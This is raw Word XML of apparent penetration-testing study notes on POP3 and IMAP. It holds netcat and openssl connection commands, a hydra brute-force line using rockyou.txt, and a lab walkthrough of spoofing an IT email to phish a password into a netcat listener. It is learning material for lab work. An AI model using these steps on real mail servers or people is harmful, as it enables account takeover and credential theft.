    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B6">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B7">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027B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B9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dpo9xv1ycx65" w:id="348"/>
      <w:bookmarkEnd w:id="348"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POP3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027BA">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027BB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For POP3 over plaintext (port 110):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027BC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.229.137 110</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027BD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027BE">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For POP3s (POP3 over SSL on port 995):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027BF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_client -connect target:995</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Do this instead of netcat to connect</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If that doesn't work, try STARTTLS authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.229.137 110</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STLS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Type in this command initially</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl s_client -connect 192.168.229.137:110 -starttls pop3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="724"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And now you can authenticate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For anonymous login:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027C9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="672"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USER anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="672"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS anything</w:t>
      </w:r>
    </w:p>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t xml:space="preserve">Bruteforce POP3 using hydra:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="468"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l jonas -P rockyou.txt -e nsr pop3://192.168.244.140</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027CE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic commands </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(you don't have to capitalize the commands)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1457"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">USER jonas → supply username</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1457"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PASS password123 → supply password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1457"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">STAT → shows number of messages and mailbox size</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1457"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LIST → lists message IDs and sizes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1457"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">RETR 1 → retrieves message 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1457"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DELE 1 → deletes message 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1457"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">QUIT → log out</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D8">
      <w:pPr>
        <w:ind w:left="-1440" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="7653338" cy="5162075"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="559" name="image436.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image436.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId822"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="7653338" cy="5162075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here the creds were </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sales:sales</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Here, you can see we only have 1 message and it had a size of 683</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Form this, they saw </w:t>
      </w:r>
      <w:hyperlink r:id="rId835">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">it@postfish.off</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> was the one sending the email, and SMTP required no authentication, so they could send an email as </w:t>
      </w:r>
      <w:hyperlink r:id="rId836">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">it@postfish.off</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. And so they did and inside the email they used key words like "Password”, “Reset” and “Link” and put the URL of our own computer in the email to "change the password." This is because the email we got legit says that IT team will be sending links to reset password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027DC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We then set up a listener on our IP for port 80 and when they clicked on the link, we got a POST request sent to our netcat listener which includes the password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027DD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1099"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId837">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Postfish</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27DE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027DF">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E0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ixjbcgormmkc" w:id="349"/>
      <w:bookmarkEnd w:id="349"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IMAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For IMAP over plaintext (port 143):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc 192.168.229.137 143</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000027E5">
